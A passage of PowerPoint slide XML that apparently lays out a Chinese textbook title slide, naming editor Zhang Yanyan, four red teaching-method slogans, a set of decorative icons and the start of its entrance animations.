            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4624705" y="5731510"/>
            <a:ext cx="2943225" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6736715" y="4239895"/>
            <a:ext cx="2548255" cy="56007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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>主编：张燕燕</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5238115" y="3315970"/>
            <a:ext cx="5756910" cy="3219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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>课程思政</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>岗课赛证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>项目式教学</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务驱动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="蝴蝶结"/>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2184400" y="1409700"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="茶杯"/>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3098800" y="1409700"/>
            <a:ext cx="296545" cy="296545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="衣架"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId13"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4013200" y="1409700"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11" descr="新建文档"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId15"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="1791335"/>
            <a:ext cx="491490" cy="491490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId17"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2459355" y="3238500"/>
            <a:ext cx="492760" cy="492760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId19"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266315" y="1922145"/>
            <a:ext cx="408305" cy="408305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId20">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId21"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1443355" y="1761490"/>
            <a:ext cx="562610" cy="562610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16" descr="线性数据图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId22">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId23"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1699260" y="3030855"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId24">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId25"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="3141980"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="循环箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId26">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId27"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="2791460"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21" descr="信"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId28">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId29"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2324100"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="声音"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId30">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId31"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2476500"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId32">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId33"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2324100"/>
            <a:ext cx="574040" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId34">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId35"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="2545080"/>
            <a:ext cx="527685" cy="527685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25" descr="上课"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId36">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId37"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4054475" y="1998980"/>
            <a:ext cx="476885" cy="476885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="图片 26" descr="皇冠"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId38">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId39"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047750" y="3238500"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="图片 27" descr="纸笔"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId40">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId41"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1040130"/>
            <a:ext cx="568325" cy="568325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="图片 28" descr="购物篮"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId42">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId43"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3317240" y="1901190"/>
            <a:ext cx="574675" cy="574675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
